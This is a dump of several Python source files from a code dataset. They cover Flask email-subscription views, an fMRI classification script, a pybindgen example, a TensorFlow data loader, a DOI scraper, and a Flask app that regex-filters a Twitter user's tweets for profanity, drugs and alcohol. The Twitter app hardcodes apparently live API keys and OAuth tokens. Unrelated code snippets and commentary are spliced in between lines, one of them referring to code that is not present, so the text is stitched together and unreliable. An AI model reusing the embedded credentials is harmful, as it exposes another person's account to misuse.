auth_required)\n\nfrom feedrsub.database import db\nfrom feedrsub.models.author import Author\nfrom feedrsub.models.email import Email\nfrom feedrsub.models.period import Period, PERIOD\nfrom feedrsub.models.subscription import Subscription\nfrom feedrsub.models.user import User\nfrom feedrsub.subscriptions import subscription_blueprint as bp\nfrom feedrsub.subscriptions.subscriptionhandler import SubscriptionHandler\nfrom feedrsub.subscriptions.tasks import 
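The Item resource above leans on next(filter(...), None) for every list lookup; the idiom in isolation, since its None default is what drives the 404/400 branches:

    items = [{'name': 'bag', 'price': 24}]

    hit = next(filter(lambda x: x['name'] == 'bag', items), None)
    miss = next(filter(lambda x: x['name'] == 'pen', items), None)

    assert hit == {'name': 'bag', 'price': 24}
    assert miss is None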
task_send_periodic_updates\nfrom feedrsub.utils.flash import ALERT\nfrom feedrsub.utils.redirect_back import redirect_back\nfrom feedrsub.utils.security import require_cron_api_key\nfrom feedrsub.utils.signals import update_user_rss\n\n\n@bp.route('/cron/update/', methods=['POST'])\n@require_cron_api_key\ndef send_update():\n \"\"\"\n Sends email updates for the specified period. If user_id is not\n provided then send emails to all users.\n \"\"\"\n period_name = request.args.get('period', None)\n if not period_name:\n return make_response('Missing Query argument: period\\n', 400)\n user_id = request.args.get('user_id', None)\n\n task_send_periodic_updates.delay(period_name, user_id)\n\n return make_response('Sending Periodic Updates\\n', 200)\n\n\n@bp.route('/subscribe/', methods=['POST'])\n@login_required\ndef subscribe(author_id):\n \"\"\"\n Create a Subscription to an author\n \"\"\"\n author = Author.query.get_or_404(author_id)\n\n sub = db.session\\\n .query(Subscription)\\\n .filter(Subscription.user_id == current_user.id,\n Subscription.author_id == author.id)\\\n .first()\n\n if not sub:\n sub = Subscription(user=current_user, author=author, active=True)\n app.logger.info('%s created', sub)\n else:\n sub.active = True\n app.logger.info('%s set to active', sub)\n\n if not sub.periods:\n sub.add_period(PERIOD.DAILY)\n\n sub.save()\n\n update_user_rss.send(bp, users=[current_user])\n\n flash(f'Successfully created a {sub.period_string()} Email Subscription to {author.name}', ALERT.SUCCESS)\n\n return redirect_back('authors.authors')\n\n\n@bp.route('/unsubscribe/', methods=['POST'])\n@login_required\ndef unsubscribe(author_id):\n \"\"\"\n Unsubscribe from an Author\n \"\"\"\n author = Author.query.get_or_404(author_id)\n\n sub = db.session\\\n .query(Subscription)\\\n .filter(Subscription.user_id == current_user.id,\n Subscription.author_id == author_id)\\\n .first()\n\n if not sub:\n app.logger.warning('No subscription found for %s and %s', current_user, author)\n\n flash(f'No Subscription found for {author.name}', ALERT.WARNING)\n\n return redirect(url_for('authors.authors'))\n\n sub.active = False\n sub.save()\n\n app.logger.info('%s set to inactive', sub)\n\n update_user_rss.send(bp, users=[current_user])\n\n flash(f'Successfully Unsubscribed from {author.name}', ALERT.SUCCESS)\n\n return redirect_back('authors.authors')\n\n\n@bp.route('/remove_period', methods=['POST'])\n@auth_required('session', 'basic')\ndef remove_period():\n \"\"\"\n Remove an Email notification Period from a Subscription\n \"\"\"\n period_name = request.args.get('period')\n sub_id = request.args.get('subscription_id')\n\n sub = Subscription.query.filter_by(id=sub_id).first()\n sub.remove_period(period_name)\n sub.save()\n\n if len(sub.periods) == 0:\n flash(\n f'You will no longer receive Email notifications for {sub.author.name}', ALERT.WARNING)\n\n app.logger.info('Period %s removed from %s', period_name, sub)\n\n flash(f'Successfully removed {period_name} Email from Subscription to {sub.author.name}', ALERT.SUCCESS)\n\n return redirect_back('users.user_home')\n\n\n@bp.route('/add_period', methods=['POST'])\n@auth_required('session', 'basic')\ndef add_period():\n \"\"\"\n Add an email notification period to a Subscription\n \"\"\"\n period_name = request.args.get('period')\n sub_id = request.args.get('subscription_id')\n\n sub = Subscription.query.filter_by(id=sub_id).first()\n\n if sub.has_period(period_name):\n flash(f'You already receive {period_name} Emails for {sub.author.name}', ALERT.WARNING)\n\n 
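subscribe() above hand-rolls a lookup-then-activate pattern; the same idea as a generic SQLAlchemy-style get-or-create helper (a sketch only; the name and signature are assumptions, not feedrsub API):

    def get_or_create(session, model, defaults=None, **filters):
        # Return the matching row, creating and staging it if absent.
        instance = session.query(model).filter_by(**filters).first()
        if instance is None:
            params = dict(filters)
            params.update(defaults or {})
            instance = model(**params)
            session.add(instance)
        return instance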
return redirect(url_for('users.user_home'))\n\n sub.add_period(period_name)\n sub.save()\n\n app.logger.info('Period %s added to %s', period_name, sub)\n\n flash(f'Successfully added {period_name} Email to your Subscription to {sub.author.name}', ALERT.SUCCESS)\n\n return redirect_back('users.user_home')\n\n\n@bp.route('/email/unsubscribe/', methods=['GET'])\ndef unsubscribed_email(hashstr):\n \"\"\"\n Handle Email Unsubscribe links. Unsubscribes from all Subscriptions\n with the given period.\n \"\"\"\n try:\n user_id, period_id = Email.unsubscribe_hash_valid(hashstr)\n except itsdangerous.BadTimeSignature:\n message = 'the unsubscribe link for this email has expired.\\n' \\\n 'Please try again with a more recent email, or login and unsubscribe manually.'\n return render_template('email_unsubscribe/failure.html', message=message)\n except itsdangerous.BadData as e:\n app.logger.error('Unsubscribe attempt with bad data. %s', e.message)\n message = 'the unsubscribe link was not valid'\n return render_template('email_unsubscribe/failure.html', message=message)\n\n period = Period.query.filter_by(id=period_id).first()\n if not period:\n message = 'no valid subscription period was found'\n return render_template('email_unsubscribe/failure.html', message=message)\n\n user = User.query.with_entities(User.id).filter_by(id=user_id).first()\n if not user:\n message = 'no valid user was found'\n return render_template('email_unsubscribe/failure.html', message=message)\n\n subs = SubscriptionHandler.get_user_subscriptions_for_period(user_id, period.name)\n if not subs:\n message = f'You are already unsubscribed from all {period.name} emails.'\n return render_template('email_unsubscribe/success.html', message=message)\n\n for sub in subs:\n sub.remove_period(period)\n\n db.session.commit()\n\n app.logger.info(\n 'Unsubscribed User %s from %s Subscriptions with Period %s',\n user, len(subs), period)\n\n message = f'You have successfully unsubscribed from all {period.name} emails.'\n return render_template('email_unsubscribe/success.html', message=message)\n","sub_path":"feedrsub/subscriptions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"500241326","text":"\"\"\"\nTransduction,\nGLobal normalization, use all data to learn mean and std\ndo the normalization only one time even for different cv splits\nIndividual normalization, normalization subject by subject\ndo the normalization only one time for different cv splits\nacross-subject-split use 90 subjects' data as train set\nwithin-subject-split use 90% of each subject's data as train set\n\"\"\"\nimport numpy as np\n\nimport os.path as op\nimport tables\nimport time\n\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\n\ndef transduction(\n classifier_type, data_x, label_y, \n cv_split, train_len):\n starttime = time.time()\n accuracy = []\n for split in cv_split:\n classifier_type.fit(\n data_x[split[:train_len]], label_y[split[:train_len]])\n prediction = classifier_type.predict(data_x[split[train_len:]])\n score = ((prediction == label_y[split[train_len:]]).sum()\n / float(len(split[train_len:])))\n accuracy.append(score)\n print(time.time() - starttime)\n print(accuracy)\n print(np.mean(accuracy))\n return accuracy\n\nn = 3\nsliceno = 1000\ntrain_size = 3600\nhem = 'lh'\nc_svc = 0.001\np_logis, c_logis = ('l2', 0.001)\nsvc = 
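unsubscribed_email() above expects Email.unsubscribe_hash_valid to verify a timed signature; a minimal sketch of how such a token is typically minted and checked with itsdangerous (the secret, salt, and payload keys are assumptions):

    from itsdangerous import BadTimeSignature, URLSafeTimedSerializer

    serializer = URLSafeTimedSerializer('secret-key', salt='email-unsubscribe')

    token = serializer.dumps({'user_id': 42, 'period_id': 3})
    try:
        payload = serializer.loads(token, max_age=7 * 24 * 3600)  # one week
    except BadTimeSignature:
        payload = None  # expired or tampered

    assert payload == {'user_id': 42, 'period_id': 3}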
SVC(kernel='linear', C=c_svc)\nlogis = LogisticRegression(penalty=p_logis, C=c_logis, n_jobs=1)\n\n\ndata_dir = '/hpc/crise/tva_rect_100subjects_voice_localizer'\ndata_path = op.join(data_dir, '{}.100subjects_data.h5'.format(hem))\nh5file = tables.open_file(data_path, driver=\"H5FD_CORE\")\ndata = h5file.root.data[:]\nsubjects = h5file.root.subjects[:]\ny_class = h5file.root.y_class[:]\ny_stim = h5file.root.y_stim[:]\nh5file.close()\n\ndata_flat = data.flatten().reshape(4000, 5400)\ny_target = np.array(y_class)\n\n\n# Do normalization subject by subject (individual)\ndata_stand_indi = data_flat[:]\ndata_minmax_indi = data_flat[:]\nfor j in range(100):\n start = 40 * j\n end = start + 40\n data_stand_indi[start:end] = StandardScaler().fit_transform(\n data_flat[start:end])\n data_minmax_indi[start:end] = MinMaxScaler().fit_transform(\n data_flat[start:end])\n\n# Do global normalization\ndata_stand_global = StandardScaler().fit_transform(data_flat[:])\ndata_minmax_global = MinMaxScaler().fit_transform(data_flat[:])\n\n# CV splits about cross-subject-splits and within-subject-splits\ndata_dir = '/hpc/crise/wang.q/src_code/Pycharm_Projects' \\\n '/100_subjects_voice_classification/'\ndata_path = op.join(data_dir,\n '100subjects_cv_splits_shuffle.h5')\nh5file = tables.open_file(data_path, driver=\"H5FD_CORE\")\ncv_across = h5file.root.cv_across[:]\ncv_within = h5file.root.cv_within[:]\nh5file.close()\n\nout_dir = '/hpc/crise/wang.q/src_code/Pycharm_Projects' \\\n '/100_subjects_voice_classification/'\n\n\nif n == 0:\n # Golbal normalization with across-subject-split\n # Use the same cv_across splits\n data = np.zeros(4 * sliceno).reshape(4, sliceno)\n data[0] = global_across_svc_stand = transduction(\n svc, data_stand_global, y_target, cv_across[:sliceno], train_size)\n data[1] = global_across_lr_stand = transduction(\n logis, data_stand_global, y_target, cv_across[:sliceno], train_size)\n data[2] = global_across_svc_minmax = transduction(\n svc, data_minmax_global, y_target, cv_across[:sliceno], train_size)\n data[3] = global_across_lr_minmax = transduction(\n logis, data_minmax_global, y_target, cv_across[:sliceno], train_size)\n\n out_path = op.join(\n out_dir, '100subjects_inter_subjects_transduction_global_across_{}.h5'.format(hem))\n h5file = tables.open_file(out_path, \"w\", driver=\"H5FD_CORE\")\n h = h5file.create_array(\n h5file.root, 'global_across_svc_stand', global_across_svc_stand)\n h = h5file.create_array(\n h5file.root, 'global_across_lr_stand', global_across_lr_stand)\n h = h5file.create_array(\n h5file.root, 'global_across_svc_minmax', global_across_svc_minmax)\n h = h5file.create_array(\n h5file.root, 'global_across_lr_minmax', global_across_lr_minmax)\n h = h5file.create_array(\n h5file.root, 'data', data)\n h5file.close()\n\nelif n == 1:\n # Global normalization for within-subject-split\n # Use the same cv_within\n data = np.zeros(4 * sliceno).reshape(4, sliceno)\n data[0] = global_within_svc_stand = transduction(\n svc, data_stand_global, y_target, cv_within[:sliceno], train_size)\n data[1] = global_within_lr_stand = transduction(\n logis, data_stand_global, y_target, cv_within[:sliceno], train_size)\n data[2] = global_within_svc_minmax = transduction(\n svc, data_minmax_global, y_target, cv_within[:sliceno], train_size)\n data[3] = global_within_lr_minmax = transduction(\n logis, data_minmax_global, y_target, cv_within[:sliceno], train_size)\n out_path = op.join(\n out_dir, '100subjects_inter_subjects_transduction_global_within_{}.h5'.format(hem))\n h5file = 
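transduction() above scores classifiers on data that was normalized using the full dataset, which is the point of the transductive setup described in the docstring; for contrast, an inductive variant would fit the scaler on the training indices of each split only (a sketch, same split convention as the script):

    from sklearn.preprocessing import StandardScaler

    def induction_score(clf, X, y, split, train_len):
        # Fit scaler and classifier on the train part of one CV split only.
        tr, te = split[:train_len], split[train_len:]
        scaler = StandardScaler().fit(X[tr])
        clf.fit(scaler.transform(X[tr]), y[tr])
        return clf.score(scaler.transform(X[te]), y[te])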
tables.open_file(out_path, \"w\", driver=\"H5FD_CORE\")\n h = h5file.create_array(\n h5file.root, 'global_within_svc_stand', global_within_svc_stand)\n h = h5file.create_array(\n h5file.root, 'global_within_lr_stand', global_within_lr_stand)\n h = h5file.create_array(\n h5file.root, 'global_within_svc_minmax', global_within_svc_minmax)\n h = h5file.create_array(\n h5file.root, 'global_within_lr_minmax', global_within_lr_minmax)\n h = h5file.create_array(\n h5file.root, 'data', data)\n h5file.close()\n\nelif n == 2:\n # Individual normalization for across-subject-split\n # Use the same cv_across splits\n data = np.zeros(4 * sliceno).reshape(4, sliceno)\n data[0] = indi_across_svc_stand = transduction(\n svc, data_stand_indi, y_target, cv_across[:sliceno], train_size)\n data[1] = indi_across_lr_stand = transduction(\n logis, data_stand_indi, y_target, cv_across[:sliceno], train_size)\n data[2] = indi_across_svc_minmax = transduction(\n svc, data_minmax_indi, y_target, cv_across[:sliceno], train_size)\n data[3] = indi_across_lr_minmax = transduction(\n logis, data_minmax_indi, y_target, cv_across[:sliceno], train_size)\n\n out_path = op.join(\n out_dir, '100subjects_inter_subjects_transduction_individual_across_{}.h5'.format(hem))\n h5file = tables.open_file(out_path, \"w\", driver=\"H5FD_CORE\")\n h = h5file.create_array(\n h5file.root, 'indi_across_svc_stand', indi_across_svc_stand)\n h = h5file.create_array(\n h5file.root, 'indi_across_lr_stand', indi_across_lr_stand)\n h = h5file.create_array(\n h5file.root, 'indi_across_svc_minmax', indi_across_svc_minmax)\n h = h5file.create_array(\n h5file.root, 'indi_across_lr_minmax', indi_across_lr_minmax)\n h = h5file.create_array(\n h5file.root, 'data', data)\n h5file.close()\n\nelse:\n # Individual normalization for within-subject-split\n # Use the same cv_within\n data = np.zeros(4 * sliceno).reshape(4, sliceno)\n data[0] = indi_within_svc_stand = transduction(\n svc, data_stand_indi, y_target, cv_within[:sliceno], train_size)\n data[1] = indi_within_lr_stand = transduction(\n logis, data_stand_indi, y_target, cv_within[:sliceno], train_size)\n data[2] = indi_within_svc_minmax = transduction(\n svc, data_minmax_indi, y_target, cv_within[:sliceno], train_size)\n data[3] = indi_within_lr_minmax = transduction(\n logis, data_minmax_indi, y_target, cv_within[:sliceno], train_size)\n out_path = op.join(\n out_dir, '100subjects_inter_subjects_transduction_individual_within_{}.h5'.format(hem))\n h5file = tables.open_file(out_path, \"w\", driver=\"H5FD_CORE\")\n h = h5file.create_array(\n h5file.root, 'indi_within_svc_stand', indi_within_svc_stand)\n h = h5file.create_array(\n h5file.root, 'indi_within_lr_stand', indi_within_lr_stand)\n h = h5file.create_array(\n h5file.root, 'indi_within_svc_minmax', indi_within_svc_minmax)\n h = h5file.create_array(\n h5file.root, 'indi_within_lr_minmax', indi_within_lr_minmax)\n h = h5file.create_array(\n h5file.root, 'data', data)\n h5file.close()\n\n","sub_path":"100_subjects_voice_classification_transduction.py","file_name":"100_subjects_voice_classification_transduction.py","file_ext":"py","file_size_in_byte":8149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"404155264","text":"#! 
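Every branch above repeats the same PyTables open_file/create_array/close sequence; the save-and-load round trip in isolation (file and array names are placeholders):

    import numpy as np
    import tables

    scores = np.zeros((4, 10))

    h5 = tables.open_file('results.h5', 'w', driver='H5FD_CORE')
    h5.create_array(h5.root, 'data', scores)
    h5.close()

    h5 = tables.open_file('results.h5', 'r', driver='H5FD_CORE')
    loaded = h5.root.data[:]
    h5.close()

    assert loaded.shape == (4, 10)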
/usr/bin/env python\n\nimport sys, os\nsys.path.insert(0, os.path.join(os.path.dirname(os.path.abspath(__file__)),\n '..', '..'))\n\n#import pybindgen\n#import pybindgen.utils\n#from pybindgen.typehandlers import base as typehandlers\nfrom pybindgen import Module, FileCodeSink, param, retval\n#from pybindgen import CppMethod, CppConstructor, CppClass, Enum\n#from pybindgen.function import CustomFunctionWrapper\n#from pybindgen.cppmethod import CustomCppMethodWrapper\nfrom pybindgen import cppclass\nfrom pybindgen.typehandlers.smart_ptr import BoostSharedPtr\n\n#from pybindgen import param, retval\n\nimport pybindgen.settings\npybindgen.settings.deprecated_virtuals = False\n\n\ndef my_module_gen(out_file):\n\n mod = Module('bsp')\n\n mod.add_include ('\"bsp.h\"')\n\n Foo = mod.add_class('Foo', memory_policy=BoostSharedPtr('::Foo'))\n\n Foo.add_constructor([param('std::string', 'datum')])\n Foo.add_constructor([])\n Foo.add_method('get_datum', retval('const std::string'), [])\n Foo.add_method('set_datum', None, [param('const std::string', 'datum')])\n\n\n mod.add_function('function_that_takes_foo', None,\n [param('boost::shared_ptr', 'foo')])\n\n mod.add_function('function_that_returns_foo', retval('boost::shared_ptr'), [])\n \n ## ---- finally, generate the whole thing ----\n mod.generate(FileCodeSink(out_file))\n\n\nif __name__ == '__main__':\n my_module_gen(sys.stdout)\n\n","sub_path":"ns3/pybindgen-0.17.0.post57+nga6376f2/examples/boost_shared_ptr/modulegen.py","file_name":"modulegen.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"511777295","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport numpy as np\nimport tensorflow as tf\n#import threading\nimport config\n\n\n\nclass multiModalData(object):\n \"\"\"\n This class manages the data i/o for a multi modal multi task model.\n \"\"\"\n def __init__(self,hdf5Pointer,inputList,outputList=None,sampleSize=None):\n self.inputList = inputList\n self.outputList = outputList\n self.inputs = {}\n self.inputShape = {}\n for inp in inputList:\n print(hdf5Pointer.keys())\n self.inputs[inp] = hdf5Pointer.get(inp)\n print(self.inputs[inp].shape)\n self.inputShape[inp] = (-1,)+self.inputs[inp].shape[1:] + (1,)\n\n self.outputs = {}\n self.outputShape = {}\n for inp in outputList:\n self.outputs[inp] = hdf5Pointer.get(inp)\n\n self.outputShape[inp] = self.outputs[inp].shape[2:] if inp != 'DNAseq' else self.outputs[inp].shape[1:]\n\n self.sampleSize = sampleSize if sampleSize is not None else self.inputs[inputList[0]][:].shape[0]\n print('Sample size: '+ str(self.sampleSize))\n\n def splitTest(self,ratio=0.8):\n assert self.sampleSize>1, 'Sample size must be greater than 1'\n if config.FLAGS.trainSize is not None:\n self.trainSize = config.FLAGS.trainSize\n else:\n assert ratio > 1./self.sampleSize, 'Train ratio is unreasonably low. Please consider a reasonable ratio, e.g. 0.8'\n if ratio >(1-1./self.sampleSize):\n print('Train ratio is unreasonably high. It is set to the default value i.e. 
0.8')\n ratio = 0.8\n self.trainSize = np.int(self.sampleSize*ratio)\n print(config.FLAGS.testSize)\n if config.FLAGS.testSize is not None:\n self.testSize = config.FLAGS.testSize\n\n else:\n self.testSize = self.sampleSize - self.trainSize\n\n allIdx = np.arange(0, self.sampleSize)\n np.random.shuffle(allIdx)\n self.trainIdx = allIdx[:self.trainSize].tolist()\n self.testIdx = np.sort(allIdx[self.trainSize:(self.trainSize+self.testSize)]).tolist()\n\n def dataBatcher(self,chunkSize=10):\n \"\"\" An generator object for batching the input-output \"\"\"\n\n assert chunkSize>=config.FLAGS.batchSize,'Chunk size must be at least batch size..'\n print('sample size: ' + str(self.sampleSize))\n print('train size:' + str(self.trainSize))\n print('test size:' + str(self.testSize))\n print( 'chunk size:' + str(chunkSize))\n print( 'batch size: ' + str(config.FLAGS.batchSize))\n while True:\n # shuffle outputs and inputs\n for chunkIdx in range(0,self.trainSize-chunkSize, chunkSize):\n chunkSliceIdx = np.sort(self.trainIdx[chunkIdx:(chunkIdx + chunkSize)]).tolist()\n inputChunk={}\n outputChunk={}\n for key in self.inputList:\n ## regularization via nullifying input\n\n inputChunk[key] = self.inputs[key][chunkSliceIdx].reshape(self.inputShape[key])\n for key in self.outputList:\n if key != 'DNAseq':\n outputChunk[key] = np.squeeze(self.normalize(self.outputs[key][chunkSliceIdx,0,:]))\n else:\n outputChunk[key] = np.squeeze(self.outputs[key][chunkSliceIdx,:,:])\n\n for batchIdx in range(0, chunkSize-config.FLAGS.batchSize, config.FLAGS.batchSize):\n yield {key:inp[batchIdx:(batchIdx + config.FLAGS.batchSize)] for key,inp in inputChunk.items()},\\\n {key:inp[batchIdx:(batchIdx + config.FLAGS.batchSize)] for key,inp in outputChunk.items()}\n\n def getTestData(self):\n print('start...')\n inputBatch = {}\n outputBatch = {}\n print(len(self.testIdx))\n for key in self.inputList:\n inputBatch[key] = self.inputs[key][self.testIdx].reshape(self.inputShape[key])\n print('input done ' + key)\n for key in self.outputList:\n if key != 'DNAseq':\n outputBatch[key] = np.squeeze(self.normalize(self.outputs[key][self.testIdx,0,:]))\n else:\n outputBatch[key] = np.squeeze(self.outputs[key][self.testIdx,:,:])\n return inputBatch, outputBatch\n\n def getAllData(self,shuffle=False):\n\n return {key:self.inputs[key][:][:,:,:,None] for key in self.inputList},\\\n {key:np.squeeze(self.normalize(self.outputs[key][:,0,:])) for key in self.outputList}\n\n\n def normalize(self,tensor):\n return np.divide(tensor.T+1e-16,tensor.sum(axis=1)+tensor.shape[1]*1e-16).T\n\n\n\n\n\n#### Under development #####\n\nclass CustomRunner(object):\n \"\"\"\n This class manages the background threads needed to fill\n a queue full of data.\n \"\"\"\n def __init__(self):\n allShapes=[]\n self.inputs = []\n self.outputs = []\n\n for inputName in config.FLAGS.data.inputList:\n shp =[sh for sh in config.FLAGS.data.inputShape[inputName]]\n self.inputs.append(tf.placeholder(tf.float32, shape=[None]+shp,name=inputName))\n allShapes.append(shp)\n for outputName in config.FLAGS.data.outputList:\n shp =[sh for sh in config.FLAGS.data.outputShape[outputName]]\n self.outputs.append(tf.placeholder(tf.float32, shape=[None]+shp,name=outputName))\n allShapes.append(shp)\n print('Input Shapes:', allShapes)\n # The actual queue of config.FLAGS.data. 
The queue contains a vector for input and output data\n\n self.queue = tf.RandomShuffleQueue(shapes=allShapes,\n dtypes=len(allShapes)*[tf.float32],\n capacity=200,\n min_after_dequeue=100)\n\n self.enqueue_op = self.queue.enqueue_many(self.inputs+self.outputs)\n\n def getBatch(self):\n \"\"\"\n Return's tensors containing a batch of inpust and outputs\n \"\"\"\n dequedBatch = self.queue.dequeue_many(config.FLAGS.batchSize)\n inputBatch = dequedBatch[:len(self.inputs)]\n outputBatch = dequedBatch[len(self.inputs):]\n\n return inputBatch, outputBatch\n\n\n def thread_main(self, sess):\n \"\"\"\n Function run on alternate thread. Basically, keep adding data to the queue.\n \"\"\"\n for inputBatch, outputBatch in config.FLAGS.data.dataBatcher():\n sess.run(self.enqueue_op, feed_dict={i: d for i, d in zip(self.inputs+self.outputs, inputBatch+outputBatch)})\n\n def start_threads(self, sess,n_threads=1):\n \"\"\" Start background threads to feed queue \"\"\"\n threads = []\n for n in range(n_threads):\n t = threading.Thread(target=self.thread_main, args=(sess,))\n t.daemon = True # thread will close when parent quits\n t.start()\n threads.append(t)\n return threads\n","sub_path":"fiddle/dataClass.py","file_name":"dataClass.py","file_ext":"py","file_size_in_byte":7047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"25688727","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.9-x86_64/egg/utopia/tools/doi.py\n# Compiled at: 2017-06-20 22:46:59\nimport re\n_inner_regex = '(10\\\\.\\\\d+/[^%\"\\\\#\\\\s]+)'\n_strip_regex = '[^\\\\d\\\\w]+'\n\ndef search(text):\n \"\"\"Look for first DOI in some text\"\"\"\n match = re.search(_inner_regex, text)\n if match is not None:\n return re.sub(('(^{0}|{0}$)').format(_strip_regex), '', match.group(0))\n else:\n return\n\n\ndef findall(text):\n \"\"\"Look for all DOIs in some text\"\"\"\n matches = re.findall(_inner_regex, text)\n return [ re.sub(('(^{0}|{0}$)').format(_strip_regex), '', match) for match in matches ]\n\n\n__all__ = [\n 'search', 'findall']\ntry:\n import spineapi\n _regex = '(?:(?:doi|digital\\\\s+object\\\\s+id(?:entifier)?)\\\\s*\\\\S?\\\\s*)?' 
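CustomRunner above hand-rolls a RandomShuffleQueue fed by daemon threads, which is the TF 1.x idiom; the same shuffle/batch/prefetch pipeline in the modern tf.data API, as a self-contained sketch (TF 2.x assumed):

    import numpy as np
    import tensorflow as tf

    inputs = np.random.rand(100, 8).astype('float32')
    targets = np.random.rand(100, 2).astype('float32')

    ds = (tf.data.Dataset.from_tensor_slices((inputs, targets))
          .shuffle(buffer_size=200)
          .batch(32)
          .prefetch(tf.data.AUTOTUNE))

    for x, y in ds.take(1):
        print(x.shape, y.shape)  # (32, 8) (32, 2)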
+ _inner_regex\n\n def scrape(document):\n \"\"\"Look for a DOI in the document\"\"\"\n margin = 90\n dois = []\n for match in document.search(_regex, spineapi.IgnoreCase + spineapi.RegExp):\n page, _, (_, _), (width, height) = pageArea = match.begin().pageArea()\n _, orientation, (left, top), (right, bottom) = lineArea = match.begin().lineArea()\n if page > 2:\n break\n if page == 2 and len(dois) > 0:\n break\n if orientation > 0:\n dois[0:0] = [\n match.text()]\n elif top > height - margin:\n dois[0:0] = [\n match.text()]\n else:\n dois.append(match.text())\n\n if len(dois) > 0:\n doi = dois[0]\n doi = re.search(_inner_regex, doi).group(0)\n doi = re.sub(('(^{0}|{0}$)').format(_strip_regex), '', doi)\n doi = re.sub('[-\xad‐‑–-―⸺⸻]', '-', doi)\n return doi\n\n\n __all__[:] = ['scrape']\nexcept ImportError:\n import logging\n logging.getLogger(__name__).info('spineapi not imported: document scraping of DOIs will be unavailable')\n spineapi = None","sub_path":"pycfiles/pyutopia_tools-3.1.0.10-py2.7/doi.py","file_name":"doi.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"343932391","text":"#render template so that we can use the template\r\n#templates directory is for HTML files that you can plug data into\r\n#static directory is for things that dont change like the css file\r\nfrom flask import Flask, render_template, request\r\n#import BaseConverter\r\nfrom werkzeug import routing\r\n\r\n\r\n#initialize the flask application\r\napp = Flask(__name__, static_url_path=\"\", static_folder=\"static\")\r\n\r\nclass RegexConvertor(routing.BaseConverter):\r\n def __init__(self, url_map, *items):\r\n super(RegexConvertor, self).__init__(url_map)\r\n self.regex = items[0]\r\n\r\n#use the RegexConvertor function as a converter\r\n#method for mapped urls\r\napp.url_map.converters['regex'] = RegexConvertor\r\n\r\n#this route will show some links matching(or not)\r\n#the regex that we are setting on the next route\r\n@app.route('/<regex(\"[a-zA-Z0-9]{4,6}\"):uid>-<slug>/')\r\ndef example(uid, slug):\r\n return \"uid: %s, slug: %s\" % (uid, slug)\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n #whenever this URL is reached, the program is going to look for a file called homepage.html\r\n #filter will be the inputted name\r\n #whatever return value you have is basically the response of the server so you can put HTML directly in it\r\n #you almost never want to put HTML in this file\r\n return render_template(\"homepage.html\")\r\n\r\n ##return 'Method used %s' % request.method\r\n\r\n\r\n\r\n@app.route('/<handle>/<filter>')\r\ndef filters(handle, filter=None):\r\n\r\n # import twython\r\n from twython import Twython\r\n # import simplejson\r\n import simplejson\r\n # import RegEx (only find all function)\r\n from re import findall\r\n # import RegEx(find)\r\n import re\r\n\r\n # pip install twython\r\n # Requires Authentication as of Twitter API v1.1\r\n t = Twython(app_key='z8eLwuxMOedusXmzOHvFIQX0o', # REPLACE 'APP_KEY' WITH YOUR APP KEY, ETC., IN THE NEXT 4 LINES\r\n app_secret='3KF164w8GLG7Tg6Nb5czMmCE2j54uOuS6GvNMM4130FYJXiVc7',\r\n oauth_token='752567920316837888-T5se5iPGLJbLcS4Jnfh1q4tNBHpK3My',\r\n oauth_token_secret='oXejT8THNR33ziZMhRSpWdPAgC4xEh4HxKBtzE5cOU2my')\r\n\r\n # allows user input for twitter handle (-@)\r\n twitter_handle = handle\r\n\r\n # get the user's tweets including retweets\r\n user_tweets = t.get_user_timeline(screen_name=twitter_handle, use_expanded_url=True, include_rts=True, count=200)\r\n\r\n # parse 200 tweets\r\n # next time you call the API set max ID to last 
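A quick usage check for the pure-regex helpers in the doi module above (assuming it is importable as doi; spineapi is not needed for these two functions):

    import doi

    assert doi.search('See doi:10.1000/xyz123 for details.') == '10.1000/xyz123'
    assert doi.findall('10.1000/a1 then 10.5555/b2;') == ['10.1000/a1', '10.5555/b2']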
twitter ID you\r\n\r\n\r\n # write the list of dictionaries into a .txt file\r\n #f = open('output.txt', 'w')\r\n #simplejson.dump(user_tweets, f)\r\n #f.close()\r\n\r\n # read in the .txt file into a string\r\n #f = open('output.txt', 'r')\r\n #all_lines = f.read()\r\n #f.close()\r\n ##print(\"File contents: \", all_lines)\r\n all_lines = str(user_tweets)\r\n #all_lines = \"Bernie wall terrorism buckets popcorn vmware muslim\"\r\n\r\n # make the search term input = profanity and then it searches those words\r\n search = filter\r\n\r\n # if they search the word profanity, it will filter the text to find these words\r\n if search == \"profanity\":\r\n # RegEx to search the .txt file for keywords\r\n regex = \"'text': '([^']*( shit | fuck | damn | bitch | ass )[^']*)'\"\r\n\r\n dataCrop = findall(regex, all_lines)\r\n\r\n # if they search the string 'nice things', then it will filter the text to find the word love\r\n if search == \"nice things\":\r\n regex = \"'text': '([^']*( love | volunteering | donation | donate | charity | award | happiness | gratitude | success )[^']*)'\"\r\n\r\n dataCrop = findall(regex, all_lines)\r\n\r\n\r\n # if they search 'drugs', then it will show up with anything to do with 421, etc.\r\n if search == \"drugs\":\r\n regex = \"'text': '([^']*( marijuana | coccaine | weed | 420 | crack | blazin | heroin | joint | cannabis | hash | hemp | dope | drug | pot )[^']*)'\"\r\n\r\n dataCrop = findall(regex, all_lines)\r\n\r\n\r\n # if they search the string 'alcohol', then it will filter the text to find alcohol\r\n if search == \"alcohol\":\r\n regex = \"'text': '([^']*( shots | party | beer )[^']*)'\"\r\n\r\n dataCrop = findall(regex, all_lines)\r\n\r\n\r\n # if they search the string 'school', then it will filter the text to find things to do with college\r\n if search == \"school\":\r\n regex = \"'text': '([^']*( school | AP | honors | class )[^']*)'\"\r\n\r\n dataCrop = findall(regex, 